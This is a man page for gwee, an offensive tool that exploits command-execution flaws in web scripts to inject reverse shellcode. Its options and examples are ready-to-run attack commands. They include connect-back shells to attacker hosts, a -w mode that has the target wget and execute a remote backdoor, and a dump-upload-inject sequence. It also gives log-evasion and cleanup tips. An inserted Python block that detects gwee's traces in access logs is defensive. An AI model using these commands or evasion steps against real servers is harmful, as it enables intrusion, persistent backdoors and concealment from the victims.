gwee man page on DragonFly

gwee(1)				Security tools			       gwee(1)

NAME
       gwee - generic web exploitation engine
       Copyright (C) 2004 Michel Blomgren <michel@cycom.se>
       Perl and Python shellcode and expertise by Sabu <sabu@sentinix.org>

SYNOPSIS
       gwee -h|-V
       gwee options url

DESCRIPTION
       gwee (generic web exploitation engine) is a small program written in C
       designed to exploit arbitrary command execution vulnerabilities in web
       scripts, such as Perl CGIs, PHP, etc. gwee is much like an exploit,
       except more general-purpose. It features several reverse (connecting)
       shellcodes (x86 Linux, FreeBSD, NetBSD, Perl script (universal), Python
       script (universal)), several methods of injecting (executing) them, a
       built-in http/https client and a built-in server (listener) for
       receiving connections (and a remote shell) from injected shellcodes.
       gwee is distributed under the MIT License. The Perl and Python
       shellcodes were written by Sabu <sabu@sentinix.org>.

OPTIONS
       -h     Display help (you can execute gwee without arguments too).

       -y string
              The string to insert before the shellcode injection command
              line. The shellcode is inserted between the values of the -y
              option and the -z option. In POST requests (default behaviour),
              the -y and -z options go into the POST data, not in the URL. In
              GET and HEAD requests, the "-y <shellcode> -z" option combination
              is appended to the URL. If you need to add a '?' you can do that
              either in the URL or as the first char of the -y option. By
              default, -y and -z are empty.

       -z string
              String to append after the shellcode injection command. By
              default, the -z string is empty. An example usage of the -y -z
              option combo would be:

              $ gwee -H -y '?testvar=' -z '|' target/cgi-bin/test.cgi

              This will resolve into:
              http://target/cgi-bin/test.cgi?testvar=perl -e "print <shellcode>"|
              Of course, you could have done it this way too, same result:
              $ gwee -z '|' 'target/cgi-bin/test.cgi?testvar='

              $ gwee -y testvar= -z '|' target/cgi-bin/test.cgi

              This will resolve into:
              http://target/cgi-bin/test.cgi
              POST data: testvar=perl -e "print <shellcode>"|

       -G     Use HTTP GET instead of POST. This is not recommended, since
              nasty long tell-tale strings will end up in the access_log. In
              order for the whole payload to fit into a 1024 byte GET request,
              the shellcode is split up into 4 separate requests, all
              producing nasty logs.

       -H     Use HTTP HEAD instead of POST/GET. Read about -G: the same nasty
              logs will appear on the target and the shellcode will be split
              into 4 requests.

       -l your_ip_or_hostname
	      The  IP or hostname to have the shellcode connect back to. Host‐
	      names will be resolved into IP numbers, since  that's  the  only
	      method used by the binary shellcodes.

       -p port
	      The port to connect back to, default is 31337.

       -s #   Choose which shellcode to install on the target:

	      0 = Sabu's Perl shellcode (default if -s is omitted)
	      1 = Linux x86 binary
	      2 = FreeBSD x86 binary
	      3 = NetBSD x86 binary
	      4 = Sabu's Python shellcode (the target must have Python installed)

       -i #   Choose shellcode injection method:

	      0 = perl -e "print
	      1 = python -c "__import__(
	      2 = printf "<hex>"
	      3 = echo -ne "<hex>" (works only if target's /bin/sh is bash)

       -I prefix_path
	      Choose a prefix to the shellcode injection method, e.g.:
	      -i1 -I /usr/local/bin/
	      that  would  parse it into: /usr/local/bin/python -c...  default
	      is empty (the preferred way).

       -T /var/tmp/.vetx.95
	      Choose a different temporary filename for the shellcode/backdoor
	      on the target than the default.

       -a user agent string
	      Choose user agent string, e.g.:
		 -a "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
	      If  -a  is  omitted, gwee will randomize from 25 real user-agent
	      strings.

       -v     Be really verbose, disclose exactly which commands are being
              executed.

       -q     Be really silent, only output error messages, nothing else.

       -L     Run built-in tcp listener (no need to use "nc -l").

       -A     Only listen for an incoming connection on -p port, nothing else.
              This is just like: nc -l -p port -w timeout

       -t seconds
	      Time-out in seconds until listener (-L) times  out.  Default  is
	      -t30 (30 seconds), -t0 means no time-out.

       -f     Simply non-interactive, you don't need to press return to
              proceed.

       -w http://home.of.attacker/reverse_shellcode
              If you specify the -w option, the injection methods won't be
              used. Instead "wget -Yoff -q -O <bd> <url>" will be executed on
              the target to download a reverse shellcode/backdoor that will
              consequently be executed as per usual. Use the -d option to dump
              a shellcode that you can upload somewhere.

       -d outfile
              This option will dump shellcode instead of injecting it
              somewhere. You use the -l -p and -s options as usual, but
              instead of connecting somewhere, the generated shellcode will be
              dumped to the file you specify after -d. Upload this file to a
              webserver and use its URL with the -w option. For example, this
              sequence dumps the x86 Linux sishell, uploads it and uses it:
              $ gwee -lyourhostname. -p1337 -s1 -d bd
              $ scp bd leet@host:/wwwroot/
              $ gwee -w http://host/bd -LG -p1337 'target/cgi-bin/vuln.cgi?'

       -P     Preserve the shellcode after injection. Normally, the exploit
              will send a HTTP POST, HEAD or GET request trying to execute "rm
              -f /var/tmp/.vetx.95". This will leave nasty logs even after you
              wipe yourself from the logs. If you know you'll get a shell on a
              box, use the -P option with the -L option. Once connected with
              -L, it'll automatically send a "shred -fu ; rm -f" over the
              connected socket.

       -r     Remove  created backdoor file (shellcode) on the target. This is
	      done automatically, but you still have the choice to  explicitly
	      do a remove.
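       The -G and -H entries above point out that GET and HEAD injection
       leaves tell-tale strings in the access_log, and -P and -r describe the
       "rm -f /var/tmp/.vetx.95" cleanup request. As an added example (not
       part of gwee or this man page), the Python below scans access-log lines
       for the injection commands, default backdoor path and wget string the
       page lists, after URL-decoding; the log lines, addresses and timestamps
       are constructed.

```python
import re
from urllib.parse import unquote_plus

# Substrings the man page says gwee places in the request, matched after URL-decoding.
SIGNATURES = (
    'perl -e "print',            # -i0 injection method
    'python -c "__import__(',    # -i1 injection method
    'printf "\\x',               # -i2 injection method (hex escapes)
    'echo -ne "\\x',             # -i3 injection method (bash only)
    '/var/tmp/.vetx.95',         # default backdoor path (-T); also in the "rm -f" cleanup request
    'wget -Yoff -q -O',          # -w download method
)

# Apache/nginx "combined" format; the quoted request field may contain \" escapes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<req>(?:\\.|[^"\\])*)" (?P<status>\d{3})'
)

def decode_request(raw: str) -> str:
    # Undo Apache's \" escaping, then URL-decode twice (gwee's examples use %3B for ';').
    text = raw.replace('\\"', '"')
    return unquote_plus(unquote_plus(text))

def scan_line(line: str):
    """Return (client_ip, method, matched_signatures), or None when the line is clean."""
    m = LOG_RE.match(line)
    if not m:
        return None
    req = decode_request(m.group('req'))
    hits = [s for s in SIGNATURES if s in req]
    if not hits:
        return None
    return m.group('ip'), req.split(' ', 1)[0], hits

def scan_log(lines):
    """Scan log lines; POST bodies are never logged, so only -G/-H payloads and the cleanup request are visible."""
    return [hit for hit in map(scan_line, lines) if hit]

# Constructed sample log (RFC 5737 addresses): a benign request, a -G injection, its cleanup HEAD, and a POST.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/May/2004:10:00:01 +0200] "GET /index.html HTTP/1.0" 200 1234',
    '198.51.100.23 - - [12/May/2004:10:02:11 +0200] "GET /cgi-bin/test.cgi?testvar=perl%20-e%20%22print%20%5Cx31%5Cxc0%22%7C HTTP/1.0" 200 512',
    '198.51.100.23 - - [12/May/2004:10:02:15 +0200] "HEAD /cgi-bin/test.cgi?testvar=rm%20-f%20/var/tmp/.vetx.95%7C HTTP/1.0" 200 0',
    '198.51.100.23 - - [12/May/2004:10:05:40 +0200] "POST /cgi-bin/test.cgi HTTP/1.0" 200 77',
]
```

       The POST line produces no hit even though the page says POST is the
       default, which is exactly why the access_log alone is not enough and
       the cleanup HEAD/GET request is often the only trace.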

EXAMPLES
       gwee -y 'q=%3B' -l fubar.org. -p 6666 -L https://target/cgi-bin/vuln.cgi
       gwee -y'?cmd=' -z'|' -G -l mydom.tld -p 9000 -s1 -i3 -Lf target/vuln.pl
       gwee -y'loginname=%3B' -l mydom.tld -p80 -Lf https://target/userstat.pl
       gwee -A -p 6666 -t0 -q

LICENSE
       gwee - generic web exploitation engine
       Copyright (C) 2004 Michel Blomgren <michel@cycom.se>
       Perl and Python shellcode and expertise by Sabu <sabu@sentinix.org>

       Permission is hereby granted, free of charge, to any person obtaining a
       copy of this software and associated documentation files (the
       "Software"), to deal in the Software without restriction, including
       without limitation the rights to use, copy, modify, merge, publish,
       distribute, sublicense, and/or sell copies of the Software, and to
       permit persons to whom the Software is furnished to do so, subject to
       the following conditions:

       The above copyright notice and this permission notice shall be included
       in all copies or substantial portions of the Software.

       THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
       OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
       MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
       IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
       CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
       TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
       SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

AUTHOR
       My name is Michel Blomgren. I'm an information security consultant
       specializing in risk/vulnerability assessment and penetration testing
       with Cycom AB, www.cycom.se. I'm the developer of SENTINIX, a GNU/Linux
       distribution designed for monitoring, intrusion detection, anti-spam,
       anti-virus and clustering. You may contact me by sending an e-mail to
       <michel@cycom.se>. If you'd like to keep the conversation private,
       fetch my PGP public key on http://www.cycom.se/misc/pubkeymichel.asc
       (886A 7B17 1747 6C82 7A7E EAC0 A3F1 2943 101C 18FA).

SEE ALSO
       rrs(1)

gwee				   May 2004			       gwee(1)